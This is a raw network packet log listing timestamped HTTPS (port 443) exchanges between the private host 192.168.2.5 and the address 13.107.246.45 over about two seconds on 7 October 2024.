Oct 7, 2024 03:15:59.400259018 CEST	49962	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.400263071 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.434299946 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.434320927 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.434418917 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.434416056 CEST	49960	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.434472084 CEST	49960	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.434711933 CEST	49960	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.434732914 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.434745073 CEST	49960	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.434751987 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.437627077 CEST	49965	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.437657118 CEST	443	49965	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.437783003 CEST	49965	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.437928915 CEST	49965	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.437943935 CEST	443	49965	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.439640045 CEST	443	49963	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.439974070 CEST	49963	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.439995050 CEST	443	49963	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.440361023 CEST	49963	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.440368891 CEST	443	49963	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.456321001 CEST	443	49964	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.456665039 CEST	49964	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.456686974 CEST	443	49964	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.457104921 CEST	49964	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.457110882 CEST	443	49964	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.483647108 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.483670950 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.483721972 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.483779907 CEST	49961	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.483820915 CEST	49961	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.484055996 CEST	49961	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.484055996 CEST	49961	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.484071016 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.484080076 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.487240076 CEST	49966	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.487272024 CEST	443	49966	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.487360001 CEST	49966	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.487560987 CEST	49966	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.487579107 CEST	443	49966	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.500031948 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.500047922 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.500117064 CEST	49962	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.500125885 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.500133038 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.500349998 CEST	49962	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.500392914 CEST	49962	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.500401020 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.500410080 CEST	49962	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.500415087 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.503295898 CEST	49967	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.503340960 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.503422022 CEST	49967	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.503545046 CEST	49967	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.503557920 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.540401936 CEST	443	49963	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.540467024 CEST	443	49963	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.540676117 CEST	49963	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.540721893 CEST	49963	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.540741920 CEST	443	49963	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.540769100 CEST	49963	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.540775061 CEST	443	49963	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.543939114 CEST	49968	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.543998957 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.544172049 CEST	49968	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.544172049 CEST	49968	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.544204950 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.559720993 CEST	443	49964	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.559778929 CEST	443	49964	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.559946060 CEST	49964	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.559946060 CEST	49964	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.559946060 CEST	49964	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.562277079 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.562316895 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.562433004 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.562545061 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.562560081 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.790210962 CEST	49964	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.790246010 CEST	443	49964	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.082179070 CEST	443	49965	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.082922935 CEST	49965	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.082942009 CEST	443	49965	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.083287954 CEST	49965	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.083301067 CEST	443	49965	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.120542049 CEST	443	49966	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.121117115 CEST	49966	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.121134043 CEST	443	49966	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.121566057 CEST	49966	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.121571064 CEST	443	49966	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.165627003 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.166623116 CEST	49967	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.166654110 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.167088985 CEST	49967	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.167094946 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.180366039 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.180996895 CEST	49968	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.181014061 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.181413889 CEST	49968	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.181420088 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.185069084 CEST	443	49965	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.185224056 CEST	443	49965	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.185296059 CEST	49965	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.185296059 CEST	49965	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.185322046 CEST	49965	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.185333967 CEST	443	49965	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.187885046 CEST	49970	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.187905073 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.188081980 CEST	49970	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.188293934 CEST	49970	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.188307047 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.194612980 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.194921017 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.194930077 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.195306063 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.195311069 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.219068050 CEST	443	49966	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.219217062 CEST	443	49966	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.219269991 CEST	49966	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.219800949 CEST	49966	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.219800949 CEST	49966	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.219816923 CEST	443	49966	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.219820023 CEST	443	49966	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.223588943 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.223617077 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.223690033 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.224479914 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.224497080 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.272399902 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.272419930 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.272480011 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.272484064 CEST	49967	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.273520947 CEST	49967	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.273718119 CEST	49967	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.273739100 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.273750067 CEST	49967	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.273757935 CEST	443	49967	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.279079914 CEST	49972	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.279128075 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.279192924 CEST	49972	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.279313087 CEST	49972	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.279329062 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.280880928 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.280900002 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.280975103 CEST	49968	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.280985117 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.281153917 CEST	49968	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.281153917 CEST	49968	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.281167984 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.281281948 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.281301975 CEST	443	49968	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.281363010 CEST	49968	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.283303022 CEST	49973	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.283346891 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.283515930 CEST	49973	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.283668995 CEST	49973	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.283687115 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.296622992 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.296638966 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.296690941 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.296736956 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.296752930 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.296786070 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.296816111 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.381434917 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.381494999 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.381519079 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.381553888 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.381916046 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.381930113 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.381943941 CEST	49969	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.381947994 CEST	443	49969	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.385227919 CEST	49974	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.385257006 CEST	443	49974	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.385369062 CEST	49974	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.385862112 CEST	49974	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.385874987 CEST	443	49974	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.841188908 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.841762066 CEST	49970	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.841803074 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.842238903 CEST	49970	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.842252016 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.855840921 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.856101990 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.856116056 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.856441975 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.856446981 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.935302019 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.935678959 CEST	49973	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.935694933 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.936050892 CEST	49973	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.936055899 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.940413952 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.940466881 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.940615892 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.940658092 CEST	49970	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.940696955 CEST	49970	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.940737963 CEST	49970	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.940768003 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.940783024 CEST	49970	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.940798044 CEST	443	49970	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.943124056 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.943445921 CEST	49975	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.943543911 CEST	443	49975	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.943700075 CEST	49972	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.943728924 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.943769932 CEST	49975	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.943873882 CEST	49975	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.943900108 CEST	443	49975	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.944082022 CEST	49972	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.944092035 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.957380056 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.957415104 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.957432985 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.957475901 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.957484961 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:00.957511902 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:00.957530975 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.034878016 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.034898996 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.034959078 CEST	49973	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.034987926 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.035037041 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.035183907 CEST	49973	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.035227060 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.035254955 CEST	49973	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.035254955 CEST	49973	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.035275936 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.035300016 CEST	443	49973	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.037807941 CEST	49976	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.037848949 CEST	443	49976	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.037934065 CEST	49976	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.038166046 CEST	49976	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.038187027 CEST	443	49976	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.042099953 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.042165995 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.042201996 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.042208910 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.042241096 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.042259932 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.042288065 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.042290926 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.042299986 CEST	49971	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.042325020 CEST	443	49971	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.043265104 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.043329954 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.043435097 CEST	49972	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.043467045 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.043520927 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.043574095 CEST	49972	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.043782949 CEST	49972	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.043782949 CEST	49972	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.043811083 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.043833971 CEST	443	49972	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.044627905 CEST	49977	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.044672966 CEST	443	49977	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.044819117 CEST	49977	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.044912100 CEST	443	49974	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.045022011 CEST	49977	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.045039892 CEST	443	49977	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.045593023 CEST	49974	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.045614958 CEST	443	49974	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.045783043 CEST	49978	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.045790911 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.045905113 CEST	49978	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.046119928 CEST	49974	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.046119928 CEST	49978	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.046132088 CEST	443	49974	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.046135902 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.147352934 CEST	443	49974	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.147414923 CEST	443	49974	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.147505999 CEST	49974	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.147735119 CEST	49974	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.147764921 CEST	443	49974	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.147790909 CEST	49974	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.147805929 CEST	443	49974	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.150662899 CEST	49979	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.150688887 CEST	443	49979	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.150758982 CEST	49979	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.150882959 CEST	49979	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.150902033 CEST	443	49979	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.644020081 CEST	443	49975	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.644582033 CEST	49975	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.644615889 CEST	443	49975	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.645198107 CEST	49975	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.645212889 CEST	443	49975	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.671641111 CEST	443	49976	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.672334909 CEST	49976	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.672358990 CEST	443	49976	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.676476955 CEST	49976	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.676485062 CEST	443	49976	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.684957981 CEST	443	49977	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.685491085 CEST	49977	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.685544968 CEST	443	49977	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.685847998 CEST	49977	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.685857058 CEST	443	49977	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.717561960 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.717988968 CEST	49978	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.718014002 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.718807936 CEST	49978	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.718812943 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.747735977 CEST	443	49975	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.747791052 CEST	443	49975	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.747847080 CEST	49975	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.748013020 CEST	49975	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.748028994 CEST	443	49975	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.748064995 CEST	49975	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.748076916 CEST	443	49975	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.750771046 CEST	49980	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.750796080 CEST	443	49980	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.750889063 CEST	49980	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.750988960 CEST	49980	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.750998020 CEST	443	49980	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.771394014 CEST	443	49976	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.771435976 CEST	443	49976	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.771491051 CEST	49976	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.771687031 CEST	49976	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.771687031 CEST	49976	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.771713018 CEST	443	49976	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.771718025 CEST	443	49976	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.773824930 CEST	49981	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.773926973 CEST	443	49981	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.774013042 CEST	49981	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.774132013 CEST	49981	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.774152994 CEST	443	49981	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.782835007 CEST	443	49977	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.783047915 CEST	443	49977	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.783143044 CEST	49977	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.783143044 CEST	49977	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.783174992 CEST	49977	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.783190012 CEST	443	49977	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.785073996 CEST	49982	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.785087109 CEST	443	49982	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.785161018 CEST	49982	443	192.168.2.5	13.107.246.45
